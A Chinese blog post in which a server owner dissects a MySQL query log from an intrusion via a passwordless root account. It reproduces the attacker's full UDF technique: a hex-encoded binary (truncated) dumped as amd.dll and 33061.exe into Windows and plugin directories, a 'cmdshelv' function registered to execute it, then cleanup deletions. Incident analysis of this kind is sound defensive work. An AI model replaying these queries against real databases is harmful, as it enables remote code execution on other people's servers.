主要是当时安装mysql的时候没有设置root密码,实际上已经设置了root用户只能localhost登录,但是不知道这个入侵者是如何远程root登录的~~~
入侵者的ip:220.189.225.30 是个美国的ip
分析:
先创建一个临时表, create table if not exists tempMix4(data LONGBLOB);
然后插入一堆代码,估计是文件的16进制编码,
110624 12:50:28 49679 Query set @a = concat('',0x4D5A90000300000004000000FFFF0000B80000000000000040...此处省去很多很多...0000000000000000000000)
110624 12:50:38 49679 Query INSERT INTO tempMix4 VALUES (@a)
然后执行了以下的语句,从而在windows下会在
49679 Query select data from tempMix into DUMPFILE 'C:\\WINDOWS\\amd.dll'
49679 Query select data from tempMix into DUMPFILE 'C:\\WINT\\amd.dll'
49679 Query select data from tempMix into DUMPFILE 'C:\\WINDOWS\\SYSTEM32\\amd.dll'
49679 Query select data from tempMix into DUMPFILE 'C:\\WINT\\amd.dll'
49679 Query select data from tempMix into DUMPFILE '..\\lib\\plugin\\amd.dll'
49679 Query select data from tempMix into DUMPFILE 'C:\\amd.dll'
49679 Query select data from tempMix into DUMPFILE '..\\bin\\amd.dll'
这些文件夹生成了一个amd.dll文件,
然后执行以下操作:估计是执行这些文件,文件具体干嘛的不知道~~
110624 12:50:44 49679 Query create function cmdshelv returns string soname 'amd.dll'
49679 Query create function cmdshelv returns string soname 'amd.dll'
49679 Query create function cmdshelv returns string soname 'C:\\WINDOWS\\system32\\amd.dll'
110624 12:50:45 49679 Query create function cmdshelv returns string soname 'C:\\WINNT\\amd.dll'
49679 Query create function cmdshelv returns string soname 'C:\\WINDOWS\\SYSTEM32\\amd.dll'
49679 Query create function cmdshelv returns string soname 'C:\\WINNT\\amd.dll'
49679 Query create function cmdshelv returns string soname 'amd.dll'
110624 12:50:46 49679 Query select cmdshelv('c:\\33061.exe')
49679 Query select cmdshelv('c:\\33061.exe')
110624 12:50:47 49679 Query select cmdshelv('cmd.exe cmd/c del c:\33061.exe')
110624 12:50:48 49679 Query select cmdshelv('cmd.exe cmd/c del c:\33061.exe')
110624 12:50:49 49679 Query select cmdshelv('cmd.exe cmd/c del c:\33061.exe')
49679 Query select cmdshelv('cmd.exe cmd/c del c:\amd.dll')
49679 Query select cmdshelv('cmd.exe cmd/c del C:\WINNT\amd.dll')
49679 Query select cmdshelv('cmd.exe cmd/c del C:\WINDOWS\amd.dll')
--------------------------------------------------------------------------------详细入侵过程如下-------------------------------------------------
110624 12:50:19 49679 Connect root@220.189.225.30 on
49679 Query drop function cmdshell
110624 12:50:20 49679 Query drop function my_udfdoor
49679 Query drop function do_system
49679 Query use mysql
110624 12:50:21 49679 Query drop table if exists tempMix4
49679 Query create table if not exists tempMix4(data LONGBLOB)
110624 12:50:28 49679 Query set @a = concat('',0x4D5A90000300000004000000FFFF0000B80000000000000040...此处省去很多很多...0000000000000000000000)
110624 12:50:38 49679 Query INSERT INTO tempMix4 VALUES (@a)
49679 Query select data from tempMix4 into DUMPFILE 'C:\\33061.exe'
110624 12:50:39 49679 Query drop table if exists tempMix4
49679 Query use mysql
49679 Query drop table if exists tempMix
110624 12:50:40 49679 Query create table if not exists tempMix(data LONGBLOB)
110624 12:50:42 49679 Query set @a = concat('',0x4D5A90000300000004000000FFFF0000B800000000000000400000000000000000...此处省去很多很多...00000000000000000)
110624 12:50:43 49679 Query INSERT INTO tempMix VALUES (@a)
49679 Query select data from tempMix into DUMPFILE 'C:\\WINDOWS\\amd.dll'
49679 Query select data from tempMix into DUMPFILE 'C:\\WINT\\amd.dll'
49679 Query select data from tempMix into DUMPFILE 'C:\\WINDOWS\\SYSTEM32\\amd.dll'
49679 Query select data from tempMix into DUMPFILE 'C:\\WINT\\amd.dll'
49679 Query select data from tempMix into DUMPFILE '..\\lib\\plugin\\amd.dll'
49679 Query select data from tempMix into DUMPFILE 'C:\\amd.dll'
49679 Query select data from tempMix into DUMPFILE '..\\bin\\amd.dll'
110624 12:50:44 49679 Query create function cmdshelv returns string soname 'amd.dll'
49679 Query create function cmdshelv returns string soname 'amd.dll'
49679 Query create function cmdshelv returns string soname 'C:\\WINDOWS\\system32\\amd.dll'
110624 12:50:45 49679 Query create function cmdshelv returns string soname 'C:\\WINNT\\amd.dll'
49679 Query create function cmdshelv returns string soname 'C:\\WINDOWS\\SYSTEM32\\amd.dll'
49679 Query create function cmdshelv returns string soname 'C:\\WINNT\\amd.dll'
49679 Query create function cmdshelv returns string soname 'amd.dll'
110624 12:50:46 49679 Query select cmdshelv('c:\\33061.exe')
49679 Query select cmdshelv('c:\\33061.exe')
110624 12:50:47 49679 Query select cmdshelv('cmd.exe cmd/c del c:\33061.exe')
110624 12:50:48 49679 Query select cmdshelv('cmd.exe cmd/c del c:\33061.exe')
110624 12:50:49 49679 Query select cmdshelv('cmd.exe cmd/c del c:\33061.exe')
49679 Query select cmdshelv('cmd.exe cmd/c del c:\amd.dll')
49679 Query select cmdshelv('cmd.exe cmd/c del C:\WINNT\amd.dll')
49679 Query select cmdshelv('cmd.exe cmd/c del C:\WINDOWS\amd.dll')
49679 Query drop table if exists tempMix
49679 Quit
分享到:
相关推荐
MySQL 安全设置加固指导教程 MySQL 数据库安全设置是数据库管理员的首要任务之一。为了确保数据库的安全,需要从多个方面进行加固。以下是 MySQL 安全设置加固指导教程的详细内容: 一、账户安全 账户安全是 ...
因此,需要保证系统具备抵御黑客攻击的能力、数据破坏后及时恢复的能力。 * 保密性:保密性是患者最为关心的问题。需要对数据库做好保密措施。当患者登录系统后所记录下的个人浏览信息随着用户的退出要及时清理。 ...
权限验证部分异步加载,增加对CDN支持优化文章对技术类得内容发布修复uc同步登录问题改进问题库和文章栏目url利于seo高级企业版,Plus版增加修复因RDS等独立mysql服务器导致微信支付回调无记录问题增加对分类栏目的...
这种攻击方式利用了Web应用程序对用户输入数据的不充分验证,导致攻击者可以 inject 恶意的SQL代码。 在上面的示例中,客户端发送请求 http://test.net/Article.php?id=36,服务器端将动态构造SQL语句:Select * ...
XSS攻击是指攻击者在Web应用程序中注入恶意脚本,然后当用户访问该Web应用程序时,恶意脚本就会被执行,从而导致用户的浏览器被控制。 在本实验中,我们将使用beef-xss工具来模拟XSS攻击。beef-xss是一个开源的XSS...
修正部分MYSQL版本造成下单过程保存个人资料失败问题 修正部分MYSQL版本造成会员登录次数不会增加 对索引模块进行升级,使得索引的重建,添加和删除性能大幅提高 修正不同版本数据库造成满就送礼物增加出错 修正统计...
泛微e-office工作微博版系统简介: 泛微e-office工作微博版...如果问题仍存在,打开操作系统菜单【开始】 -【程序】-【泛微协同办公产品(e-office)】-【服务配置】,重设 IP或者端口号,避免因为冲突导致无法使用
其中用户的密码使用 MD5 加密后存储于数据库,用户与用户间的聊天记录信息使用 RSA 加密算法后形成密文在后台服务器进行传输,好友经过共享密钥进行解密后才能得到明文,基于以上的加密操作来防止中间攻击导致的数据...
Xiuno BBS 是国产的一套面向千万级数据量设计的开源论坛软件,基于 PHP/MySQL/MongoDB/Memcached/Linux C/JQuery/ 等技术,采用 MVC AOP 模式组织代码,旨在解决BBS站点负载过高的问题,是大中型站点比较理想的选择...
redo日志用于记录事务的执行过程,undo日志用于记录事务的回滚过程。 二十四、InnoDB引擎和MyISAM引擎的区别 InnoDB引擎和MyISAM引擎是MySQL中的两种存储引擎。InnoDB引擎支持事务和锁机制,MyISAM引擎不支持事务...